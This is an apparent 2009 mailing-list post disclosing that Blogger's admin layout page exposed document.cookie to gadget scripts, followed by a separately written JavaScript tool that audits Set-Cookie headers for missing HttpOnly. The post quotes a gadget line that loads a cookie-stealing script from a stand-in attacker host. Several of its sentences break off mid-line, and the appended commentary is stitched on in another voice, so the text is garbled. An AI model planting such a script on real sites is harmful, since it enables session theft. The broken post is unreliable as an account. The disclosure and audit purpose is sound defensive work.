From: David Turner
Date: Thu, 7 May 2009 17:12:40 -0700 (PDT)
Local: Thurs, May 7 2009 8:12 pm
Subject: Gadgets can steal cookies on admin page
Blogger cookies are usually marked with HttpOnly, so that they can't
be stolen by gadgets. This is a good thing. An exception seems to be in the admin interface. If you go to Layout/Page Elements, click "Add a Gadget" and "HTML/Javascript", and enter <script src="http://evil.example.com/stealcookies.js"></script>, that script will have access to document.cookie. I don't know if the cookies this can access are sufficient to do any
This is not a simple attack -- it would probably require creating a
I wish there were a non-public place to report security issues, but I
In short: Only install widgets created by people you trust not to
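The check a practitioner would want before relying on the HttpOnly protection the post describes is an audit of the Set-Cookie headers actually issued on the admin pages: any cookie set without HttpOnly, and in path scope for the page, is exactly what an injected gadget script can read through document.cookie. The following is an added example, not code from the original post or from Blogger; the cookie names and headers are constructed for illustration, and domain scoping is ignored (all cookies are assumed to come from the page's own host).

```javascript
// Added example, not code from the original post. It audits Set-Cookie
// headers the way a practitioner would before trusting HttpOnly: any cookie
// issued without HttpOnly (and in scope for the page's path) is readable by
// an injected <script>, e.g. a gadget script, through document.cookie.
// The sample headers below are constructed for illustration.

function parseSetCookie(header) {
  const [nameValue, ...attrParts] = header.split(';').map(s => s.trim());
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const value = eq === -1 ? '' : nameValue.slice(eq + 1);
  const attrs = {};
  for (const part of attrParts) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return {
    name,
    value,
    path: typeof attrs.path === 'string' ? attrs.path : '/',
    httpOnly: Object.prototype.hasOwnProperty.call(attrs, 'httponly'),
    secure: Object.prototype.hasOwnProperty.call(attrs, 'secure'),
  };
}

// RFC 6265 section 5.1.4 path-match: the cookie is sent (and visible to
// script) when the request path equals the cookie path, or extends it at a
// "/" boundary.
function pathMatches(cookiePath, requestPath) {
  if (cookiePath === requestPath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  if (cookiePath.endsWith('/')) return true;
  return requestPath.charAt(cookiePath.length) === '/';
}

// Names of cookies a script running at requestPath could read from
// document.cookie: in path scope and not HttpOnly. Domain scoping is
// ignored here; all sample cookies are assumed to be set by the page's host.
function scriptReadableCookies(setCookieHeaders, requestPath) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(c => !c.httpOnly && pathMatches(c.path, requestPath))
    .map(c => c.name);
}

// Constructed sample: hypothetical cookie names, not Blogger's real ones.
const sampleHeaders = [
  'SID=abc123; Domain=.example.com; Path=/; Secure; HttpOnly',
  'session=xyz789; Path=/; HttpOnly',
  'admin_state=layout; Path=/admin; Secure',
  'pref=lang%3Den; Path=/',
];

console.log('readable at /admin/layout:', scriptReadableCookies(sampleHeaders, '/admin/layout'));
console.log('readable at /:', scriptReadableCookies(sampleHeaders, '/'));
```

Run against the headers a real admin page returns (for example, copied from the browser's network panel), the non-empty list is the set of cookies an HTML/Javascript gadget could exfiltrate; whether that list grants anything useful is the open question the post raises.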